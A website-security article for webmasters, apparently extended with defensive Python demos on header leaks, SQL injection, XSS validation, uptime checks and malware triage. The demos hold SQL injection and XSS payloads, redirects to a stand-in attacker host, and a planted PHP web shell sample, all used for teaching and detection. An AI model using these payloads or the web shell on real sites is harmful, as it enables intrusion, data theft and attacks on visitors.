Information is everything. The web is full of free information for everyone to use, but there are things webmasters do not want people to know, things that should be kept away from prying eyes. Be it an exclusive section of your website for premium users or content that thousands of users rely on, it is best to stock up your arsenal before things go awry.
There is no such thing as an unhackable website; there are only those that come close, and those that are offline. It is important to know how attacks are made in order to plan ahead.
Attacker’s Point of View
Image by: Benjamin Earwicker
The first thing an attacker wants to know is what software your host runs: web server, operating system, language runtime and their versions. A version string is enough to look up known vulnerabilities, if any exist, and pick an exploit to get into your system. Choosing a web host that cares about security is therefore very important, especially on shared hosting, where you are at the mercy of your host and of every other customer on the same server.
With today's technology most websites have become interactive: users request and input data, personalize and manipulate the site. But every input is also a potential entry point. A good attacker will scan a target website thoroughly, probing each of those inputs, just to gain access to its server.
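The reconnaissance step described above usually starts with the response headers your server volunteers. The following is an added example, not code from the article: it flags headers that disclose product versions, first against a constructed sample response (an assumption of a typical unhardened LAMP host) and, optionally, against a live host you are authorized to test.

```python
# Added example (not from the article): flag HTTP response headers that
# reveal server, OS or framework versions, the first thing an attacker
# looks for when fingerprinting a host.
import re
import urllib.error
import urllib.request

# Headers that commonly carry product/version strings (compared lowercase).
VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
# Anything that looks like "name/1.2" or "name 1.2.3" is treated as a leak.
VERSION_RE = re.compile(r"\d+\.\d+")


def leaky_headers(headers):
    """Return (header, value) pairs that disclose version details.

    `headers` is any mapping of header name -> value; names are compared
    case-insensitively so both urllib's and a hand-built dict work.
    """
    leaks = []
    for name, value in headers.items():
        if name.lower() in VERSION_HEADERS and VERSION_RE.search(value):
            leaks.append((name, value))
    return leaks


def fetch_headers(url, timeout=5):
    """Fetch only the response headers of `url` with a HEAD request.

    Needs network access; run it against hosts you own or may test.
    """
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return dict(resp.headers.items())
    except urllib.error.HTTPError as err:
        # Error pages leak versions just as well; keep their headers.
        return dict(err.headers.items())


# Constructed sample response, typical of an unhardened LAMP host (assumption).
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.3 (CentOS)",
    "X-Powered-By": "PHP/5.2.6",
    "Content-Type": "text/html; charset=UTF-8",
}

if __name__ == "__main__":
    for name, value in leaky_headers(SAMPLE_HEADERS):
        print(f"version disclosure: {name}: {value}")
```

On Apache, `ServerTokens Prod` and `ServerSignature Off` trim the `Server` header, and `expose_php = Off` in php.ini removes `X-Powered-By`. Hiding the version only removes the shortcut; the real defence is still to patch what those versions name.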
More below for in-depth discussion about attacks.
When a Hacker Attacks
Image by: eddmun
An experienced hacker does not attack blindly. When he attacks, he attacks with conviction (or curiosity), usually armed with vital information gathered beforehand that can be used to destabilize your site. Below are some of the most common forms of attack:
- Authorization Bypass
- SQL Injection
- Cross-site Scripting(XSS)
Defacement is common on government and celebrity websites, as well as on plenty of innocent ones. Attacks like this range from acts of retaliation to plain fun.
A successful authorization bypass lets an attacker reach pages, files or records that should be off limits, such as an admin panel or another user's data, because a permission check is missing or can be skipped. It will make you shout "this is my code, not yours!" Some hackers actually want a piece of your code, either to make a clone out of it or to destroy it.
Then there is SQL injection, where the attacker types SQL fragments into unsuspecting form fields so that they become part of the query your application runs against the database. The result is information that is not normally available even to your users: passwords (or their hashes), e-mails, and things you do not want people to know. And how would it impact you if an attacker dropped your most important table and you had no backup? Ouch!
Another form of attack is Cross-site Scripting (XSS). Here the bad guy goes after the good guys: script injected into your pages runs in your visitors' browsers, not on your server. What makes this attack evil is that it is easy to defend against yet easy to miss and hard to detect. How will you defend yourself if you are caught by surprise?
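To make the injection concrete, here is an added example that is not part of the article: the same login query written with string concatenation and with a parameterized query, run against an in-memory SQLite table so it can be tried offline. The user table, the accounts in it and the SHA-256 password hashing are all constructed for the demo.

```python
# Added example (not from the article): the same login query written with
# string concatenation (injectable) and with a parameterized query (safe),
# run against an in-memory SQLite table so it can be tried offline.
import hashlib
import sqlite3


def _hash(password):
    # Plain SHA-256 keeps the demo short; real code uses a slow, salted hash.
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db():
    """Create a throwaway users table with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, is_admin INTEGER)"
    )
    sample = [("alice", "hunter2", 0), ("bob", "letmein", 0), ("admin", "s3cret", 1)]
    conn.executemany(
        "INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
        [(u, _hash(p), a) for u, p, a in sample],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by hand: whatever the user types becomes part of the query."""
    query = (
        "SELECT id, username FROM users WHERE username = '"
        + username + "' AND password_hash = '" + _hash(password) + "'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterized: the driver sends values separately, so quotes and
    comment markers inside `username` are just characters, never SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    # "admin' --" closes the string and comments out the password check.
    print(login_vulnerable(db, "admin' --", "wrong"))    # [(3, 'admin')]
    # "' OR 1=1 --" makes the WHERE clause true for every row: a full dump.
    print(login_vulnerable(db, "' OR 1=1 --", "wrong"))  # all three users
    print(login_safe(db, "admin' --", "wrong"))          # []
```

Python's sqlite3 refuses to run more than one statement per `execute()`, so the table-dropping `'; DROP TABLE users; --` variant cannot be shown here; drivers that allow stacked statements would run it just as readily as the two payloads above.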
Image by: Ramasamy Chidambaram
I remember writing and submitting a simple script in an input field of a friend's website, which caused all users to see a pop-up whenever they loaded the homepage and then be redirected to another website. Instant chaos. Of course, this matter is easily fixed by simple input validation.
Image by: wikkedhill
Perhaps the best way to validate user input is not to list what is not allowed but to specify exactly what is allowed: a pattern for each field, and anything else is rejected. To specify is to exclude. Less time and effort, and fewer surprises. Neat. For free text that cannot be reduced to a pattern, such as a comment, escape it when you write it into the page so that it is displayed rather than executed.
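The following is an added example, not code from the article, covering both the script-in-a-field attack from the anecdote and the allowlist approach just described. The field names, the allowlist patterns and the two payloads are assumptions constructed for the demo; it also shows why a denylist that blocks one known token is not enough.

```python
# Added example (not from the article): allowlist validation for form fields
# and HTML escaping for output, tried against the kind of script payload the
# article describes. Field names and rules are assumptions for the demo.
import html
import re

# Allowlist: for each field, the only shape that is accepted.
FIELD_RULES = {
    "username": re.compile(r"[A-Za-z0-9_.-]{3,32}"),
    "age": re.compile(r"[1-9][0-9]{0,2}"),
    "website": re.compile(r"https?://[A-Za-z0-9.-]+(/[A-Za-z0-9._/-]*)?"),
}


def validate(form):
    """Return the names of fields that do not match their allowlist rule.

    Unknown fields are rejected too: anything not explicitly allowed is out.
    """
    bad = []
    for name, value in form.items():
        rule = FIELD_RULES.get(name)
        if rule is None or not rule.fullmatch(value):
            bad.append(name)
    return bad


def denylist_validate(value):
    """The approach the article argues against: block one known bad token."""
    return "<script" not in value.lower()


def render_comment(author, text):
    """Escape user data before it is put into an HTML page.

    Free text such as a comment cannot be allowlisted into a simple pattern,
    so output encoding is the control that keeps it from executing.
    """
    return "<p><b>{}</b>: {}</p>".format(
        html.escape(author, quote=True), html.escape(text, quote=True)
    )


# Constructed payloads: the pop-up-and-redirect script, and a variant that
# carries no <script> tag at all.
PAYLOAD = "<script>alert('pwned');window.location='http://evil.example/'</script>"
SNEAKY = "<img src=x onerror=\"window.location='http://evil.example/'\">"

if __name__ == "__main__":
    print(validate({"username": PAYLOAD, "age": "27"}))  # ['username']
    print(denylist_validate(SNEAKY))                     # True: slips through
    print(render_comment("guest", PAYLOAD))              # harmless text
```

Validation and escaping are separate controls: the allowlist rejects bad data at the door, and escaping protects every place where data you accepted (or data from the database, which may be older than your validation rules) is written back into HTML.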
Security Guy Should Know
Image by: Julien Tromeur
There are many third-party applications today, appearing at a rate that would impress Moore. But is the guy in charge of security knowledgeable about the third-party applications you actually run and the vulnerabilities they bring? If not, trouble is looming: keep an inventory of every plugin and library you use, with its version, or opt to write your own modules.
The security guy should also know about Google hacking. Is Google still your friend? With advanced search operators, even text files on seemingly impenetrable servers can be harvested for everyone to see, as long as a crawler could reach them. Knowing what robots.txt is can stop this form of attack, for a while: it only asks well-behaved crawlers to stay away, it denies access to nobody, and it advertises the very paths you want hidden. Keep sensitive files outside the web root or behind authentication instead.
You can download the trial versions of the Acunetix and BeyondSecurity scanners and find flaws inside and outside your website. Scan only sites you own or are authorized to test.
Good services do not always come free, but at least your website will be better secured.
If your CMS is WordPress refer to this comprehensive guide on Hardening WordPress.
Monitor Website Uptime
Image by: Chris Cockram
Is your website still working? Are people enjoying your services while you are away from your keyboard? You and the security guy cannot monitor your website 24 hours a day just to maintain its availability (and stability); it is simply impossible. Let someone do the monitoring for you. SiteUptime's service will alert you via SMS or e-mail if your website becomes unavailable. Companies offering similar services include HostTracker, Internetseer and WebSitePulse. Now every time you receive an SMS you will automatically think your website is down.
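A monitor that only checks "did the server answer" will happily report a defaced or malware-injected page as up, because that page still returns HTTP 200. The following added example, not code from the article or from any of the services named above, probes a page and also requires a marker string that belongs on it, and raises an alert only after several consecutive failures so that a single network blip does not page you. The URL, marker and thresholds are assumptions.

```python
# Added example (not from the article): a minimal uptime probe that checks
# status, expected content and response time, with an alert that fires only
# after consecutive failures. URL, marker and thresholds are assumptions.
import time
import urllib.error
import urllib.request


def evaluate(status, body, marker, elapsed, max_seconds=5.0):
    """Classify one probe. Returns None when healthy, else a short reason."""
    if status != 200:
        return f"status {status}"
    if marker not in body:
        return "expected content missing (defaced or broken page?)"
    if elapsed > max_seconds:
        return f"slow response ({elapsed:.1f}s)"
    return None


def probe(url, marker, timeout=10):
    """Fetch `url` once and evaluate it. Needs network access."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, ""
    except (urllib.error.URLError, OSError) as err:
        return f"unreachable: {err}"
    return evaluate(status, body, marker, time.monotonic() - start)


def should_alert(history, threshold=3):
    """True once the last `threshold` probes all failed (None = healthy)."""
    if len(history) < threshold:
        return False
    return all(reason is not None for reason in history[-threshold:])


if __name__ == "__main__":
    # Probe every minute; alert after three failures in a row.
    results = []
    while True:
        results.append(probe("https://example.com/", "Example Domain"))
        if should_alert(results):
            print("ALERT:", results[-1])
        time.sleep(60)
```

Run the probe from somewhere other than the server itself, otherwise a host that is down takes its own monitor with it; that is the main thing an external monitoring service gives you.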
Hacked? It’s Not the End
If you feel your security has been compromised, or it really has, stay calm but act fast. Connect to your FTP account like your life depends on it and, if you get in, change your password immediately to limit further damage; change the passwords of any other accounts that share it, such as the hosting control panel and the database, since the attacker may hold those too (and prefer SFTP or FTPS if your host offers them, because plain FTP sends your password in the clear). Now you may breathe slowly. If you cannot connect to your FTP at all, immediately notify the authorities so they can investigate the crime scene, and your web host so you regain access as soon as possible.
I know it is hard to take your website offline, but if your website is infected with malware that attacks your visitors, take it offline you must. That is another way of taking good care of them.
There are actually many forms of attack; in practice they tend to arrive through FTP (weak or stolen credentials) and through vulnerabilities in CGI scripts and other web applications. It is wise to research your applications for known vulnerabilities and available patches. Always keep yourself, and your applications, updated!
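Deciding whether the site is infected means finding what the attacker changed. The following is an added example, not code from the article: a triage scan over a web root that lists files modified since a cut-off time and files containing patterns typical of injected malware (hidden iframes, obfuscated eval chains, dropped web shells). The pattern list is an assumption to tune per site, not a complete signature set, and the mini site it scans is constructed in a temporary directory.

```python
# Added example (not from the article): triage scan of a web root after a
# suspected compromise. Lists files changed since a cut-off time and files
# containing patterns typical of injected malware or dropped web shells.
# The pattern list is an assumption to tune per site, not a full signature set.
import os
import re
import shutil
import tempfile
import time

# Indicators: obfuscated eval chains, the old preg_replace /e code-execution
# trick, and hidden iframes that load a third-party site for every visitor.
SUSPICIOUS = [
    re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/e[\"']", re.I),
    re.compile(r"<iframe[^>]*(width|height)\s*=\s*[\"']?0", re.I),
    re.compile(r"<iframe[^>]*(display\s*:\s*none|visibility\s*:\s*hidden)", re.I),
]
SCAN_EXTENSIONS = (".php", ".inc", ".html", ".htm", ".js", ".htaccess")


def triage(root, changed_since):
    """Walk `root`; return (recently_changed, suspicious) as sorted lists.

    `changed_since` is a Unix timestamp; `suspicious` holds (path, patterns)
    pairs. Every file is checked for its mtime, only web content is grepped.
    """
    recent, suspicious = [], []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if os.path.islink(path):
                continue  # do not follow links out of the web root
            if os.path.getmtime(path) >= changed_since:
                recent.append(path)
            if not fname.lower().endswith(SCAN_EXTENSIONS):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            hits = [p.pattern for p in SUSPICIOUS if p.search(content)]
            if hits:
                suspicious.append((path, hits))
    return sorted(recent), sorted(suspicious)


def build_demo_site(base):
    """Write a constructed mini site: a clean page, a page with an injected
    hidden iframe, and a web shell dropped into the images folder."""
    clean = os.path.join(base, "index.php")
    infected = os.path.join(base, "about.html")
    shell = os.path.join(base, "images", "x.php")
    os.makedirs(os.path.dirname(shell), exist_ok=True)
    with open(clean, "w") as fh:
        fh.write("<?php echo 'Welcome'; ?>\n")
    with open(infected, "w") as fh:
        fh.write('<p>About us</p>\n'
                 '<iframe src="http://evil.example/" width="0" height="0"></iframe>\n')
    with open(shell, "w") as fh:
        fh.write("<?php eval(base64_decode($_POST['c'])); ?>\n")
    # Backdate the clean page so it falls outside the "recently changed" window.
    old = time.time() - 30 * 86400
    os.utime(clean, (old, old))
    return clean, infected, shell


def run_demo():
    """Build the sample site in a temp dir, triage the last 7 days, clean up."""
    base = tempfile.mkdtemp()
    try:
        clean, infected, shell = build_demo_site(base)
        recent, suspicious = triage(base, time.time() - 7 * 86400)
        return {"clean": clean, "infected": infected, "shell": shell,
                "recent": recent, "suspicious": suspicious}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    result = run_demo()
    print("changed recently:", result["recent"])
    for path, hits in result["suspicious"]:
        print("suspicious:", path, hits)
```

On a real site, run `triage` against a copy of the web root rather than the live tree, and compare the hit list against a clean backup or the original application download; an attacker who touched the files can also reset their timestamps, so the content scan matters more than the modification dates.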
Prevention is Better Than Cure
If you think you have done all you can to secure your website but something still feels lacking, you might want to hire proven-and-tested security experts to try to break into your site, legally and with your written permission. They do not come cheap, of course.
Below are experts in finding vulnerabilities; they offer roughly the same services and boast notable clients. Meet the good guys.
News and Updates
Updates are made to patch loopholes and add features. Not aware that something is wrong with your current applications? A good way to know whether your website is secure is to follow the exploits that users and developers around the web have found; from there, you or your security guy can work out what to patch next. A comprehensive and current list of exploits can be found at Exploit-DB.com. Prevention is better than cure, as they say.
Also, keep up to date on the attacks happening globally. A good news site about cyber attacks and other security news is CyberInsecure.com. Another gem that I found is SecurityFocus.com, which provides easy browsing of hundreds of vendors' vulnerabilities. Sleek.
A person who is always up to date is never caught off guard. Good luck to all!